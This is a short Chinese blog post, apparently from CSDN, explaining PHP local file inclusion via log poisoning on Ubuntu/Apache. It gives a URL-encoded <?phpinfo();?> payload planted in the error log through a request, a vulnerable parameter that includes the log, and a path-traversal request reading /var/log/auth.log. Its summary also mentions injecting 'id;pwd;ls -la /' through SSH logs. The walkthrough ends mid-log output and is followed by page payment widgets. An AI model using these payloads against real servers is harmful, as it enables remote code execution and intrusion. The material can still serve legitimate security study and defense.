PHP文件包含漏洞 日志

这篇博客探讨了在Ubuntu环境中,由于Apache权限限制,PHP文件包含漏洞如何利用日志进行攻击。通过包含日志文件,攻击者可以尝试写入SSH命令,如在示例中展示的`id;pwd;ls -la /`,以此来获取系统信息或执行恶意操作。
摘要由CSDN通过智能技术生成

一般虚拟主机都有自己独立的日志,是可读可写的 但是UBUNTU默认装的APACHE权限很低,对日志不可读
我们可以包含日志

在这里%3C%3Fphpinfo%28%29%3B%3F%3E这句就是转换过了的<?phpinfo();?>,我们提交

http://www.123.com/%3C%3Fphpinfo%28%29%3B%3F%3E

这样肯定会报出错找不到页面,而一出错就被记在错误日志里了

http://xxx.com/z.php?zizzy=/home/user/www.xxx.com/logs/www-error_log

这样这个日志文件就被包含成了phpinfo的信息,而回显也就成了一个显示php信息的页面。
--------------------

另外的包含假设SSH日志可读 如果你的HTTPD能读当前的SSH日志:
root@ubuntu:/var/log# chmod 777 auth.log

包含他

root@Ubuntu:~# GET http://5.5.5.2/lif.php?file=../../../var/log/auth.log | head
Aug  2 18:55:44 ubuntu sshd[812]: Server listening on 0.0.0.0 port 22.
Aug  2 18:55:44 ubuntu sshd[812]: Server listening on :: port 22.
Aug  2 18:55:55
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小韩韩啊

你的鼓励是对我最大的支持

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值